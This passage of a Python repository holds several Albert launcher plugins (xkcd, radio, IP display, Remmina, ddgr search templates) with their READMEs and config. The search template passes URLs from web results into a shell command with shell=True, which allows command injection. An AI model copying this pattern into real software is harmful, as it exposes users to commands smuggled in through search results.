with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "totp "
def synopsis(self):
return ""
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
results = []
try:
for path in pass_2fa_dir.glob("**/*.gpg"):
results.append(get_as_item(path))
except Exception: # user to report error
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep># Albert Python Plugins Bootstrapping
Purpose of this repository is to facilitate the bootstrapping of other Albert
plugins. For that it makes use of
[cookiecutter](https://github.com/cookiecutter/cookiecutter) to customise and
bootstrap the repository.
## Example usage
#!sh
# install cookiecutter
pip install cookiecutter
...
# Download this cookiecutter package locally and use it
git clone https://github.com/bergercookie/awesome-albert-plugins
cookiecutter awesome-albert-plugins/cookiecutter
# configure
# go through the prompts and adjust accordingly
<file_sep># pulse_control - Albert plugin
## Description
Allows to interact with PulseAudio and do the following:
* Set Input/Output audio device
* Set an Input/Output port
* Set an audio profile
By default, when the plugin is triggered it shows you the active port for each
one of your sources and sinks (i.e., input and output devices respectively) as
well as the active profile for each one of your sound cards.

You can also search for a specific sink/source port or a specific card profile
by adding more characters to your search after the trigger word. Upon selection
of the item, the corresponding source/sink/profile is activated.

## Prerequisites
Install pulseaudio and [pulsectl, its python
wrapper](https://pypi.org/project/pulsectl/). Also install the ``fuzzywuzzy``
python module.
```
pip3 install --user --upgrade pulsectl fuzzywuzzy
```
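For reference, the plugin's core boils down to a few `pulsectl` calls; a
minimal sketch, assuming a running PulseAudio server:

```
from pulsectl import Pulse

with Pulse("pulse-control-demo") as pulse:
    for sink in pulse.sink_list():  # output devices
        print(sink.name, sink.port_active)
    for source in pulse.source_list():  # input devices
        print(source.name, source.port_active)
```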
## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interested
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep>"""Fetch xkcd comics like a boss."""
from datetime import datetime, timedelta
from pathlib import Path
import json
import subprocess
import sys
import traceback
import albert as v0
from fuzzywuzzy import process
md_name = "Xkcd"
md_description = "Xkcd Comics Fetcher"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/xkcd-albert-plugin"
md_bin_dependencies = ["xkcd-dl"]
md_lib_dependencies = ["fuzzywuzzy"]
icon_path = str(Path(__file__).parent / "image.png")
settings_path = Path(v0.cacheLocation()) / "xkcd"
last_update_path = settings_path / "last_update"
xkcd_dict = Path.home() / ".xkcd_dict.json"
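# Populated by `xkcd-dl -u`: maps each comic number to its metadata - at least
# the "description" and "date-published" fields used in get_as_item below.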
def get_as_item(k: str, v: dict):
return v0.Item(
id=md_name,
icon=[icon_path],
text=v["description"],
subtext=v["date-published"],
completion="",
actions=[
UrlAction("Open in xkcd.com", f"https://www.xkcd.com/{k}"),
ClipAction("Copy URL", f"https://www.xkcd.com/{k}"),
],
)
def update_date_file():
now = (datetime.now() - datetime(1970, 1, 1)).total_seconds()
with open(last_update_path, "w") as f:
f.write(str(now))
def update_xkcd_db():
return subprocess.call(["xkcd-dl", "-u"])
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "xkcd "
def synopsis(self):
return "xkcd title term"
def finalize(self):
pass
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create cache location
settings_path.mkdir(parents=False, exist_ok=True)
if not last_update_path.is_file():
update_date_file()
update_xkcd_db()
def handleQuery(self, query) -> None:
results = []
# check whether I have downloaded the latest metadata
with open(last_update_path, "r") as f:
date_str = float(f.readline().strip())
last_date = datetime.fromtimestamp(date_str)
if datetime.now() - last_date > timedelta(days=1): # run an update daily
update_date_file()
update_xkcd_db()
try:
with open(xkcd_dict, "r", encoding="utf-8") as f:
d = json.load(f)
if len(query.string) in [0, 1]: # Display all items
for k, v in d.items():
results.append(get_as_item(k, v))
else: # fuzzy search
desc_to_item = {item[1]["description"]: item for item in d.items()}
matched = process.extract(
query.string.strip(), list(desc_to_item.keys()), limit=20
)
for m in [elem[0] for elem in matched]:
# bypass a unicode issue - use .get
item = desc_to_item.get(m)
if item:
results.append(get_as_item(*item))
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{sys.exc_info()}",
)
],
),
)
query.add(results)
<file_sep>"""Saxophone - Play internet radio streams from albert."""
import select
import socket
import json
import operator
import random
import traceback
from enum import Enum
from pathlib import Path
from typing import List, Optional
import albert as v0
import subprocess
import gi # isort:skip
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip
md_name = "Saxophone"
md_description = "Play internet radio streams from albert"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//saxophone"
)
md_bin_dependencies = ["vlc"]
icons_path = Path(__file__).parent / "images"
def get_icon(icon: str):
return str(icons_path / icon)
def notify(
app_name: str,
msg: str,
image=None,
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def sort_random(streams):
random.shuffle(streams)
def sort_favorite(streams):
streams.sort(key=operator.attrgetter("favorite"), reverse=True)
icon_path = get_icon("saxophone")
stop_icon_path = get_icon("stop_icon")
repeat_icon_path = get_icon("repeat_icon")
cache_path = Path(v0.cacheLocation()) / "saxophone"
pids_path = cache_path / "streams_on"
data_path = Path(v0.dataLocation()) / "saxophone"
json_config = str(Path(__file__).parent / "config" / "saxophone.json")
sort_fn = sort_random
# sort_fn = sort_favorite
vlc_socket = Path("/tmp/cvlc.unix")
socket_timeout = 0.2
# Classes & supplementary functions -----------------------------------------------------------
class UrlType(Enum):
PLAYLIST = 0
RAW_STREAM = 1
COUNT = 2
INVALID = 3
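# VLC's "oldrc" interface accepts plain-text commands over the UNIX socket set
# up via --rc-unix below - e.g. "add <url>", "stop", "is_playing", "logout".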
def issue_cmd(cmd: str) -> str:
if not cmd.endswith("\n"):
cmd += "\n"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.settimeout(socket_timeout)
s.connect(str(vlc_socket))
to_send = str.encode(cmd)
s.sendall(to_send)
# we don't want to block
res = ""
try:
ready = select.select([s], [], [], socket_timeout)
if ready[0]:
while True:
b = s.recv(4096)
if b:
res += b.decode("utf-8")
else:
break
except socket.timeout:
pass
return res
class Stream:
def __init__(self, url: str, name: str, **kargs):
super(Stream, self).__init__()
self.url: str = url
self.name: str = name
self.description: Optional[str] = kargs.get("description")
self.homepage: Optional[str] = kargs.get("homepage")
self._icon: Optional[str] = kargs.get("icon")
self.favorite: bool = kargs.get("favorite", False)
self._url_type: Optional[UrlType] = None
if self.url.endswith(".pls") or self.url.endswith(".m3u"):
self._url_type = UrlType.PLAYLIST
else:
self._url_type = UrlType.RAW_STREAM
def url_type(self) -> Optional[UrlType]: # type: ignore
return self._url_type
def icon(self) -> Optional[str]:
"""Cache the icon."""
if self._icon is None:
return None
return get_icon(self._icon)
streams: List[Stream] = []
def init_streams():
global streams
streams.clear()
with open(json_config) as f:
conts = json.load(f)
for item in conts["all"]:
streams.append(Stream(**item))
sort_fn(streams)
def launch_vlc():
if vlc_socket.exists():
if not vlc_socket.is_socket():
raise RuntimeError(f'Expected "{vlc_socket}" to be a socket, but it is not')
else:
v0.info("VLC RC Interface is already up.")
else:
# communicate over UNIX socket with vlc
subprocess.Popen(["vlc", "-I", "oldrc", "--rc-unix", vlc_socket])
def is_radio_on() -> bool:
res = issue_cmd("is_playing")
return int(res) == 1
def stop_radio():
"""Turn off the radio."""
res = issue_cmd("stop")
v0.debug(f"Stopping radio,\n{res}")
def start_stream(stream: Stream):
res = issue_cmd(f"add {stream.url}")
v0.debug(f"Starting stream,\n{res}")
# calls ---------------------------------------------------------------------------------------
# initialise all available streams
init_streams()
# launch VLC
launch_vlc()
# supplementary functions ---------------------------------------------------------------------
def get_as_item(stream: Stream):
icon = stream.icon() or icon_path
actions = [FuncAction("Play", lambda stream=stream: start_stream(stream))]
if stream.homepage:
actions.append(UrlAction("Go to radio homepage", stream.homepage))
return v0.Item(
id=f"{md_name}_{stream.name}",
icon=[icon],
text=stream.name,
subtext=stream.description if stream.description else "",
completion="",
actions=actions,
)
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "sax"
def synopsis(self):
return "some radio"
def handleQuery(self, query) -> None: # noqa
results = []
if len(query.string.strip()) <= 1 and is_radio_on():
results.insert(
0,
v0.Item(
id=f"{md_name}_stop",
icon=[stop_icon_path],
text="Stop Radio",
actions=[FuncAction("Stop Radio", lambda: stop_radio())],
),
)
reindex_item = v0.Item(
id=f"{md_name}_repeat",
icon=[repeat_icon_path],
text="Reindex stations",
actions=[FuncAction("Reindex", lambda: init_streams())],
)
try:
query_str = query.string.strip().lower()
if not query_str:
results.append(reindex_item)
for stream in streams:
results.append(get_as_item(stream))
else:
for stream in streams:
if query_str in stream.name.lower() or (
stream.description and query_str.lower() in stream.description.lower()
):
results.append(get_as_item(stream))
# reindex goes at the end of the list if we are searching for a stream
results.append(reindex_item)
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, data_path, pids_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
issue_cmd("logout")
<file_sep>"""IPs of the host machine."""
from typing import Dict
import traceback
from pathlib import Path
import netifaces
from urllib import request
from fuzzywuzzy import process
from albert import *
md_iid = "0.5"
md_version = "0.2"
md_name = "IPs of the host machine"
md_description = "Shows machine IPs"
md_license = "BSD-2"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//ipshow"
md_maintainers = "<NAME>"
md_lib_dependencies = ["fuzzywuzzy"]
icon_path = str(Path(__file__).parent / "ipshow")
cache_path = Path(cacheLocation()) / "ipshow"
config_path = Path(configLocation()) / "ipshow"
data_path = Path(dataLocation()) / "ipshow"
# flags to tweak ------------------------------------------------------------------------------
show_ipv4_only = True
discard_bridge_ifaces = True
families = netifaces.address_families
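# Maps socket family constants to their names, e.g. families[2] == "AF_INET"
# and families[10] == "AF_INET6" on Linux.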
def filter_actions_by_query(items, query, score_cutoff=20):
sorted_results_text = process.extractBests(
query, [x.text for x in items], score_cutoff=score_cutoff
)
sorted_results_subtext = process.extractBests(
query, [x.subtext for x in items], score_cutoff=score_cutoff
)
results_arr = [(x, score_cutoff) for x in items]
for text_res, score in sorted_results_text:
for i in range(len(items)):
if items[i].text == text_res and results_arr[i][1] < score:
results_arr[i] = (items[i], score)
for subtext_res, score in sorted_results_subtext:
for i in range(len(items)):
if items[i].subtext == subtext_res and results_arr[i][1] < score:
results_arr[i] = (items[i], score)
return [x[0] for x in results_arr if x[1] > score_cutoff or len(query.strip()) == 0]
class ClipAction(Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: setClipboardText(copy_text))
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def defaultTrigger(self):
return "ip "
def handleQuery(self, query):
results = []
if not query.isValid:
return
try:
# External IP address -------------------------------------------------------------
try:
with request.urlopen("https://ipecho.net/plain", timeout=1.5) as response:
external_ip = response.read().decode()
except Exception:
external_ip = "Timeout fetching public IP"
results.append(
self.get_as_item(
text=external_ip,
subtext="External IP Address",
actions=[
ClipAction("Copy address", external_ip),
],
)
)
# IP address in all interfaces - by default IPv4 ----------------------------------
ifaces = netifaces.interfaces()
# for each interface --------------------------------------------------------------
for iface in ifaces:
addrs = netifaces.ifaddresses(iface)
for family_to_addrs in addrs.items():
family = families[family_to_addrs[0]]
# discard all but IPv4?
if show_ipv4_only and family != "AF_INET":
continue
# discard bridge interfaces?
if discard_bridge_ifaces and iface.startswith("br-"):
continue
# for all addresses in this interface -------------------------------------
for i, addr_dict in enumerate(family_to_addrs[1]):
own_addr = addr_dict["addr"]
broadcast = addr_dict.get("broadcast")
netmask = addr_dict.get("netmask")
results.append(
self.get_as_item(
text=own_addr,
subtext=iface.ljust(15)
+ f" | {family} | Broadcast: {broadcast} | Netmask: {netmask}",
actions=[
ClipAction("Copy address", own_addr),
ClipAction("Copy interface", iface),
],
)
)
# Gateways ------------------------------------------------------------------------
# Default gateway
def_gws: Dict[int, tuple] = netifaces.gateways()["default"]
for def_gw in def_gws.items():
family_int = def_gw[0]
addr = def_gw[1][0]
iface = def_gw[1][1]
results.append(
self.get_as_item(
text=f"[GW - {iface}] {addr}",
subtext=families[family_int],
actions=[
ClipAction("Copy address", addr),
ClipAction("Copy interface", iface),
],
)
)
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
Item(
id=self.name(),
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(filter_actions_by_query(results, query.string, 20))
def get_as_item(self, text, subtext, actions=[]):
return Item(
id=self.name(),
icon=[icon_path],
text=text,
subtext=subtext,
completion=self.defaultTrigger() + text,
actions=actions,
)
# supplementary functions ---------------------------------------------------------------------
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
<file_sep># isort ------------------------------------------------------------------------
[tool.isort]
include_trailing_comma = true
line_length = 95
multi_line_output = 3
profile = "black"
# black ------------------------------------------------------------------------
[tool.black]
preview = true
line-length = 95
target-version = ['py38', 'py39']
include = '\.pyi?$'
# mypy -------------------------------------------------------------------------
[tool.mypy]
warn_return_any = true
warn_unused_configs = true
[[tool.mypy.overrides]]
module = [
"tqdm",
"pytest",
"pexpect",
"notion_client",
"taskw",
"taskw.warrior",
"google.auth.transport.requests",
"google_auth_oauthlib.flow",
]
ignore_missing_imports = true
# pylint -----------------------------------------------------------------------
[tool.pylint]
[tool.pylint.master]
persistent = "yes"
suggestion-mode = "yes"
unsafe-load-any-extension = "no"
ignore = "VCS"
[tool.pylint.messages_control]
disable = "C0330,C0326,C0103,W0613,R0201,R1720,R1705,W0104,C0301"
[tool.pylint.refactoring]
max-nested-blocks = 5
never-returning-functions = "sys.exit,argparse.parse_error"
[tool.pylint.similarities]
ignore-comments = "yes"
ignore-docstrings = "no"
ignore-imports = "yes"
# ignore-signatures=no
min-similarity-lines = 4
[tool.pylint.format]
max-line-length = 95
ignore-invalid-name = true
max-module-lines = 500
[tool.pylint.string]
check-quote-consistency = "yes"
# pyright ----------------------------------------------------------------------
[tool.pyright]
reportMissingImports = true
reportMissingTypeStubs = false
pythonVersion = "3.8"
pythonPlatform = "Linux"
# coverage.py ------------------------------------------------------------------
[tool.coverage]
[tool.coverage.run]
omit = [
"quickstart.py",
"quickstart_gkeep.py",
"a.py",
"*/.pdbrc.py",
"tests/*",
]
# pytest -----------------------------------------------------------------------
[tool.pytest.ini_options]
addopts = ["--ignore-glob=quickstart*", "--doctest-modules"]
# ruff -------------------------------------------------------------------------
[tool.ruff]
line-length = 95
target-version = "py38"
# vim: tw=80
<file_sep># jira - Albert plugin
<a href="https://www.codacy.com/manual/bergercookie/jira-albert-plugin">
<img src="https://api.codacy.com/project/badge/Grade/02097c818d9b43ecb35badfb0e4befd7"/></a>
<a href="https://github.com/bergercookie/jira-albert-plugin/blob/master/LICENSE" alt="LICENCE">
<img src="https://img.shields.io/github/license/bergercookie/jira-albert-plugin.svg" /></a>
<a href="https://github.com/psf/black">
<img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg"></a>
<a href=" https://github.com/bergercookie/jira-albert-plugin/issues">
<img src="https://img.shields.io/github/issues/bergercookie/jira-albert-plugin/jira.svg"></a>
## Demo
| | |
|:-------------------------:|:-------------------------:|
|<img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-setup0.png"> | <img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-setup1.png"> |
<img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-setup2.png"> | <img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-basic.png"> Basic usage |
<img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-fuzzy-search-title.png"> Fuzzy search | <img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-options.png"> Options for issue |
## Description
`jira-albert-plugin` allows you to interact with your jira server via the albert
launcher.
On first run, you'll be guided through a series of setup steps:
- user to use, e.g., <EMAIL>
- server to connect to, e.g., https://an-example-jira-server.atlassian.net
You also have to create an API key: https://id.atlassian.com/manage/api-tokens
- To make sure the API key is stored safely, the plugin expects to find it
gpg-encrypted using your default gpg-id under the following path:
```
~/.password-store/jira-albert-plugin/api-key.gpg
```
You can do that either manually `gpg --encrypt... -o ...` or consider using
[Pass](https://www.passwordstore.org/), the UNIX password manager.
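If you prefer scripting this step, a minimal sketch along these lines stores
the token where the plugin expects it (assumes `gpg` is set up with a default
key; the token string is a placeholder):

```
import subprocess
from pathlib import Path

dest = Path.home() / ".password-store" / "jira-albert-plugin" / "api-key.gpg"
dest.parent.mkdir(parents=True, exist_ok=True)
# gpg encrypts stdin with your default key and writes the result to dest
subprocess.run(
    ["gpg", "--encrypt", "--default-recipient-self", "--output", str(dest)],
    input=b"<your-api-token>",  # placeholder
    check=True,
)
```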
After having set up the plugin, on trigger the plugin will fetch all the issues
assigned to the current user. You also get an option of creating a new issue
from scratch.
By pressing on one of the issues you'll be redirected to its jira page. On
`[ALT]` you have options to copy the jira URL, or to transition it, e.g.,
`Backlog` -> `In Progress` or `Select From Development` -> `Done`.
Issues are sorted and colored according to their priority.
You can narrow down the search to the most relevant items by typing additional
letters/words. The plugin uses fuzzy search to find the most relevant issues to
show.
Additional information:
* To reset/use a different account, delete the config location (by default
`~/.config/albert/jira`) and substitute the gpg-encrypted api-key.
## Motivation
Navigating to JIRA, searching for your ticket of choice and changing its status
via the web interface is cumbersome. This plugin lets you do that far more
easily and in addition, without leaving the keyboard for a second.
## Manual installation instructions
Requirements:
- Albert - [Installation instructions](https://albertlauncher.github.io/docs/installing/)
- Albert Python Interface: ``v0.4``
- Python version >= 3.5
## Self Promotion
If you find this tool useful, please [star it on
Github](https://github.com/bergercookie/jira-albert-plugin)
## TODO List
See [ISSUES list](https://github.com/bergercookie/jira-albert-plugin/issues) for the things
that I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>#!/usr/bin/env bash
set -ex
ROOT=`dirname ${BASH_SOURCE[0]}`/..
ls -lart .
ls -lart $ROOT
ls -lart $ROOT/plugins
(
cd $ROOT
"$ROOT"/create_ddgr_plugins.py
)
test -d "$ROOT/plugins/search_wikipedia"
test -d "$ROOT/plugins/search_amazon"
<file_sep>"""Lookup and Start Remmina Connections."""
import configparser
import os
import subprocess
from glob import glob
from pathlib import Path
from re import IGNORECASE, search
from typing import Tuple, Sequence
from albert import *
md_iid = "0.5"
md_version = "0.2"
md_name = "Remmina"
md_description = "Start a Remmina VNC/SFTP connection"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/remmina"
md_maintainers = "<NAME>, <NAME>"
md_bin_dependencies = ["remmina"]
md_lib_dependencies = ["configparser"]
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "rem"
def synopsis(self):
return "<connection name>"
def initialize(self):
self.module_path = Path(__file__).absolute().parent
self.icon_path = self.module_path / "icons" / "remmina.svg"
self.connections_path = Path(os.environ["HOME"]) / ".local" / "share" / "remmina"
def get_protocol_icon_path(self, proto: str) -> Path:
path = self.module_path / "icons" / f"remmina-{proto.lower()}-symbolic.svg"
if path.is_file():
return path
else:
return self.icon_path
def getConfigFiles(self) -> Sequence[str]:
return [f for f in glob(str(self.connections_path) + "/**/*.remmina", recursive=True)]
def getAsItem(self, name, group, server, proto, file):
return Item(
id=name,
icon=[str(self.get_protocol_icon_path(proto))],
text=f"{group}/ {name}" if group else name,
subtext="%s %s" % (proto, server),
actions=[Action("open", "Open connection", lambda cf=file: runRemmina(cf))],
)
def handleQuery(self, query):
files = self.getConfigFiles()
all_connections = [getConnectionProperties(f) for f in files]
stripped = query.string.strip()
results = []
if stripped: # specific query by the user
for p in all_connections:
# search in names and groups
if search(stripped, p[0], IGNORECASE) or search(stripped, p[1], IGNORECASE):
results.append(self.getAsItem(*p))
else: # nothing specified yet, show all possible connections
for p in all_connections:
results.append(self.getAsItem(*p))
# add it at the very end - fallback choice in case none of the connections is what the
# user wants
results.append(
Item(
id=md_name,
icon=[str(self.icon_path)],
text=md_name,
subtext=__doc__,
actions=[Action("open", "Open Remmina", runRemmina)],
)
)
query.add(results)
def runRemmina(cf: str = "") -> None:
args = (["remmina"], ["remmina", "-c", cf])[len(cf) > 0]
subprocess.Popen(args)
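# A .remmina connection file is a small INI file; the keys parsed below live in
# its [remmina] section (values here are illustrative):
#   [remmina]
#   name=my-server
#   group=work
#   server=192.168.1.10
#   protocol=VNC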
def getConnectionProperties(f: str) -> Tuple[str, str, str, str, str]:
assert os.path.isfile(f), f"No such file -> {f}"
conf = configparser.ConfigParser()
conf.read(f)
name = conf["remmina"]["name"]
group = conf["remmina"]["group"]
server = conf["remmina"]["server"]
proto = conf["remmina"]["protocol"]
return name, group, server, proto, f
<file_sep># bluetooth - Albert plugin
## Demo
https://raw.githubusercontent.com/bergercookie/awesome-albert-plugins/master/plugins/bluetooth/misc/demo.mp4


## Description
This is a small plugin that allows for:
* Connecting/disconnecting a device
* Pairing and trusting a device
* Enabling/disabling bluetooth altogether
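Under the hood these actions map to plain invocations of the two CLI tools
below; roughly (the MAC address is a placeholder):

```
import subprocess

subprocess.run(["rfkill", "unblock", "bluetooth"], check=True)  # enable bluetooth
subprocess.run(["bluetoothctl", "connect", "AA:BB:CC:DD:EE:FF"], check=True)  # placeholder MAC
```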
## Installation instructions
Make sure you have `rfkill` and `bluetoothctl` installed and available in your
`$PATH`
## Self Promotion
If you find this tool useful, please [star it on
Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interested
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep># Scratchpad - Albert plugin
## Demo


## Description
Capture all of your thoughts and one-line notes to a single text file.
Use `s ` to trigger the plugin, add whatever text you want and on ENTER albert
will save it to a designated textfile.
This way you can capture all your thoughts to a file and then decide whether you
want to spend the time to further organise these better / split them to multiple
files, etc.
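The save action essentially boils down to appending a line to that file; a
minimal sketch (the actual file location is whatever you configure):

```
from pathlib import Path

scratchpad = Path.home() / "scratchpad.txt"  # placeholder path
with scratchpad.open("a") as f:
    f.write("my one-line thought\n")
```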
## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interested
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep>"""
This file was autogenerated from the search_template directory by the
`create_ddgr_plugins.py` script. In case you find a bug please submit a patch
to the aforementioned directory and script instead.
"""
"""{{ cookiecutter.plugin_short_description }}."""
import json
import shutil
import subprocess
import traceback
from io import StringIO
from pathlib import Path
from typing import Dict, Sequence, Tuple
import albert as v0
md_iid = "0.5"
md_version = "0.2"
md_name = "Search - {{ cookiecutter.plugin_name }}"
md_description = "{{ cookiecutter.plugin_short_description }}"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins"
md_bin_dependencies = ["ddgr"]
md_lib_dependencies = []
icon_path = str(Path(__file__).parent / "{{ cookiecutter.plugin_name }}")
cache_path = Path(v0.cacheLocation()) / "{{ cookiecutter.plugin_name }}"
config_path = Path(v0.configLocation()) / "{{ cookiecutter.plugin_name }}"
data_path = Path(v0.dataLocation()) / "{{ cookiecutter.plugin_name }}"
# set it to the corresponding site for the search at hand
# e.g.,: https://github.com/jarun/googler/blob/master/auto-completion/googler_at/googler_at
ddgr_at = "{{ cookiecutter.ddgr_at }}"
# special way to handle the url? --------------------------------------------------------------
url_handler = "{{ cookiecutter.url_handler }}"
url_handler_check_cmd = "{{ cookiecutter.url_handler_check_cmd }}"
if url_handler_check_cmd:
p = subprocess.Popen(url_handler_check_cmd, shell=True)
p.communicate()
if p.returncode != 0:
print(
f'[W] Disabling the url handler "{url_handler}"... - Condition'
f" {url_handler_check_cmd} not met"
)
url_handler = None
url_handler_desc = "{{ cookiecutter.url_handler_description }}"
if not url_handler_desc:
url_handler_desc = "Run special action"
# browser -------------------------------------------------------------------------------------
# look for google-chrome first
inco_browser = shutil.which("google-chrome")
if not inco_browser:
inco_browser = shutil.which("chromium-browser")
if inco_browser:
inco_cmd = lambda url: subprocess.Popen([inco_browser, "--incognito", url])
else:
inco_cmd = None
# supplementary functions ---------------------------------------------------------------------
def query_ddgr(query_str) -> Tuple[Sequence[Dict[str, str]], str]:
"""Make a query to ddgr and return the results in json."""
li = ["ddgr", "--noprompt", "--unsafe", "--json", query_str]
if ddgr_at:
li = li[:2] + ["-w", ddgr_at] + li[2:]
p = subprocess.Popen(li, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if stdout:
json_ret = json.load(StringIO(stdout.decode("utf-8")))
else:
json_ret = [dict()]
stderr = stderr.decode("utf-8")
return json_ret, stderr
def get_ddgr_result_as_item(ddgr_item: dict):
actions = [
UrlAction("Open in browser", ddgr_item["url"]),
ClipAction("Copy URL", ddgr_item["url"]),
]
# incognito search
if inco_cmd:
actions.insert(
1,
FuncAction(
"Open in browser [incognito mode]",
lambda url=ddgr_item["url"]: inco_cmd(url), # type: ignore
),
)
# special url handler
if url_handler:
# check that the handler is actually there
actions.insert(
0,
FuncAction(
url_handler_desc,
lambda url_handler=url_handler: subprocess.Popen(
f'{url_handler} {ddgr_item["url"]}', shell=True
),
),
)
return v0.Item(
id=md_name,
icon=[icon_path],
text=ddgr_item["title"],
subtext=ddgr_item["abstract"],
actions=actions,
)
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
